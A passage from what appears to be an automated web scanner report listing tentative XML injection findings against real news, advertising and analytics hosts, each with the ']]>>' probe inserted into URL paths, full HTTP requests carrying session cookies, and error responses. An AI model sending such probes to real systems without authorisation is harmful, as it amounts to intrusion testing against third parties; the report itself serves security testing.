Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F0ABE889696888F3
x-amz-id-2: qcrGoHSax490oAVAqjRYwRZv73lJAguM+2SRqs+KQRO9cUlvi/iOFY2B3+3iBBeK
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:19:26 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2dde3d9dceffd8e12e4082fc97b3e8359b1e85b048121f490a294d2441d1f4a1d3460dcdcfa652c7
Via: 1.0 95b17deadcb6eb61302c26e3cdac6107.cloudfront.net:11180 (CloudFront), 1.0 1e5670446b2d0f62f93100e25163ce0a.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F0ABE889696888F3</RequestId><HostId>qcrGoHSax490oAVAqjRYwRZv73lJAguM+2SRqs+KQRO9cUlvi/
...[SNIP]...

10.17. http://cdn.dnaindia.com/images/710/favicon-reddit.ico [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-reddit.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/710/favicon-reddit.ico]]>> HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 702A2FE53DE047A5
x-amz-id-2: KayoR3qm+GJpZS8L6xNaxQj7kKc8Toca6AekVNqAX4mO9kXsjrG0plqasvyAWx8G
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:19:39 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 48e3dab4ddc36233859ab572f953002d48012e03ef07a196557ad0d1a3e43659b7fa3ec5f5787879
Via: 1.0 c36847c5252e758d61b94a1d396be659.cloudfront.net:11180 (CloudFront), 1.0 1e5670446b2d0f62f93100e25163ce0a.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>702A2FE53DE047A5</RequestId><HostId>KayoR3qm+GJpZS8L6xNaxQj7kKc8Toca6AekVNqAX4mO9kXsjr
...[SNIP]...

10.18. http://cdn.dnaindia.com/images/710/favicon-yahoo-buzz.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-yahoo-buzz.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/710/favicon-yahoo-buzz.ico HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 18A5ECB70C8BC3DF
x-amz-id-2: 8G2+8xFj7hpUlEHI21tnCBF+Os9jSgeNM/nGNvaIn7BfEQMoYiYGmwuD1hwgWlxU
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:17:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8ac8cb627f8695283741652315c889b4ac7a14e5ae7b257f0fd9e916ba271c7b7083a6d968ecd448
Via: 1.0 a4a33eb6d328de8565b9c9b34e7c790d.cloudfront.net:11180 (CloudFront), 1.0 9944d439be34815bf637b293c33c4694.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>18A5ECB70C8BC3DF</RequestId><HostId>8G2+8xFj7hpUlEHI21tnCBF+Os9jSgeNM/nGNvaIn7BfEQMoYi
...[SNIP]...

10.19. http://cdn.dnaindia.com/images/710/favicon-yahoo-buzz.ico [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-yahoo-buzz.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/710]]>>/favicon-yahoo-buzz.ico HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C82D9478BF057795
x-amz-id-2: pLTAW9E60c/mh7pK/qgzXWA0IqBv8Gc17eEjpwX680TPsl0QFkwFVxWss9beoLo7
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:18:05 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ff839a60cf92db999b7863dd2afdcb739264def19c7f5b574112ae1406beae79e91cc2459bf0b7db
Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 9944d439be34815bf637b293c33c4694.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C82D9478BF057795</RequestId><HostId>pLTAW9E60c/mh7pK/qgzXWA0IqBv8Gc17eEjpwX680TPsl0QFk
...[SNIP]...

10.20. http://cdn.dnaindia.com/images/710/favicon-yahoo-buzz.ico [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-yahoo-buzz.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/710/favicon-yahoo-buzz.ico]]>> HTTP/1.1
Host: cdn.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A5159C7B98C43A73
x-amz-id-2: ti7DrVnEd+Kj/RFim3c/gcSLkIdwk+64RRKIHV6TZCr2MAWICmFodPVG0sswLg1N
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:18:17 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e541fa04597fbcb2d294413fa0073988f7a642b29e54997a642b448addace107e45b09571305bace
Via: 1.0 db26aad8eddbf74ac3abe77abd5de63f.cloudfront.net:11180 (CloudFront), 1.0 9944d439be34815bf637b293c33c4694.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A5159C7B98C43A73</RequestId><HostId>ti7DrVnEd+Kj/RFim3c/gcSLkIdwk+64RRKIHV6TZCr2MAWICm
...[SNIP]...

10.21. http://load.exelator.com/load/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/?p=104&g=280&absid=21051315103139790868608&j=0 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJw1i8ENgCAMAHdhAtsChfoy8aEDOEBtYQGfxt0lJv4ulzsVlPsSknDsa5gHoYSzRFPw6pOinRlgiObNoIPWnOLXjWPZ%252FiMxeclJeQJkYiBkJ6tNHXo30jA%252FL%252B9SHFw%253D; BFF=eJxLtDK2qi62MjSwUgoxNDAJcbC0tDRSss60MjQ3MLcGShhbKfn6%252B4V4%252BETGh3kGe4YoWScS0GIKFUc2BVmtMVyiFrcMAGx9JaM%253D; TFF=eJxLtDK1qi62MjSyUjI0MHEwsDBwsLS0NFKyTrQysqrOtDK0BmJzA3MgZQBj1mKoNwSpN0ZTb2QN4SLrM4drI04HkDYwId7s1IjUnMSSVOLMrgUAc5lBWA%253D%253D

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 02:37:47 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.22. http://load.exelator.com/load/OptOut.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/OptOut.php?service=checkNAI&nocache=0.975763 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJw1i8ENgCAMAHdhAtsChfoy8aEDOEBtYQGfxt0lJv4ulzsVlPsSknDsa5gHoYSzRFPw6pOinRlgiObNoIPWnOLXjWPZ%252FiMxeclJeQJkYiBkJ6tNHXo30jA%252FL%252B9SHFw%253D; BFF=eJxLtLKwqi62MjSwUgoxNDAJcbC0tDRSss60MjQ3MLcGShhbKfn6%252B4V4%252BETGh3kGe4YoWSdaGRri1WMKFUc2BlmtMbKEIUTC0QndFDOYBE7VyOZYgiTMDdANMYEIoys0M8Sq0MwQu0KERbVkeYVkZ%252BNwJHYnAQCc%252FGrs; TFF=eJydkTEOwyAMRe%252BSE3y7CAezcIyuDAyVuqVblLuXirapEiGZDsggvW%252F7iazkdV2UWCeCS5iRQgg8xays600p1iOQWvC5bieeXvzlwHNsz9%252BcfGO2RK1wHZLPvcu13POj9Hq7jgUPWvN%252F1my1fk8SJIDsm%252B380GYtZv4PwYiDpzGHnR9yaDGzgycTuT0BGeDKhw%253D%253D

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 11:06:57 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-2

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.23. http://load.exelator.com/load/OptOut.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load/OptOut.php]]>>?service=checkNAI&nocache=0.975763 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJw1i8ENgCAMAHdhAtsChfoy8aEDOEBtYQGfxt0lJv4ulzsVlPsSknDsa5gHoYSzRFPw6pOinRlgiObNoIPWnOLXjWPZ%252FiMxeclJeQJkYiBkJ6tNHXo30jA%252FL%252B9SHFw%253D; BFF=eJxLtLKwqi62MjSwUgoxNDAJcbC0tDRSss60MjQ3MLcGShhbKfn6%252B4V4%252BETGh3kGe4YoWSdaGRri1WMKFUc2BlmtMbKEIUTC0QndFDOYBE7VyOZYgiTMDdANMYEIoys0M8Sq0MwQu0KERbVkeYVkZ%252BNwJHYnAQCc%252FGrs; TFF=eJydkTEOwyAMRe%252BSE3y7CAezcIyuDAyVuqVblLuXirapEiGZDsggvW%252F7iazkdV2UWCeCS5iRQgg8xays600p1iOQWvC5bieeXvzlwHNsz9%252BcfGO2RK1wHZLPvcu13POj9Hq7jgUPWvN%252F1my1fk8SJIDsm%252B380GYtZv4PwYiDpzGHnR9yaDGzgycTuT0BGeDKhw%253D%253D

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 11:06:58 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-3

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.24. http://lvs.truehits.in.th/goggen.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://lvs.truehits.in.th
Path:   /goggen.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /goggen.php]]>>?hc=c0002761&bv=0&rf=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok+thailand+news&test=TEST&web=3fbOcpOvxZ4hUP7wA/uRcQ%3D%3D&bn=Netscape&ss=1920*1200&sc=16&sv=1.3&ck=y&ja=y&vt=8467E527.1&fp=s&fv=10.3%20r183&truehitspage=Homepage&truehitsurl=http%3a//www.nationmultimedia.com/ HTTP/1.1
Host: lvs.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 02:29:53 GMT
Server: lighttpd

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.25. http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/Innity/030911TourismMalaysia728x90.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads]]>>/Innity/030911TourismMalaysia728x90.html HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; _cbclose62518=1; _uid62518=2BAEE501.1; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 02:54:55 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.26. http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/Innity/030911TourismMalaysia728x90.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads/Innity]]>>/030911TourismMalaysia728x90.html HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; _cbclose62518=1; _uid62518=2BAEE501.1; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 02:55:11 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.27. http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/Innity/030911TourismMalaysia728x90.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads/Innity/030911TourismMalaysia728x90.html]]>> HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; _cbclose62518=1; _uid62518=2BAEE501.1; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 02:55:24 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.28. http://media1.bangkokpost.com/ads/Poonphol/140611PoonPholOffice_728x90.swf [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/Poonphol/140611PoonPholOffice_728x90.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads]]>>/Poonphol/140611PoonPholOffice_728x90.swf?clicktag=http://ads2.bangkokpost.co.th/adclick/CID=00001db264e3f66300000000/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=820931449 HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 02:34:31 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.29. http://media1.bangkokpost.com/ads/Poonphol/140611PoonPholOffice_728x90.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/Poonphol/140611PoonPholOffice_728x90.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

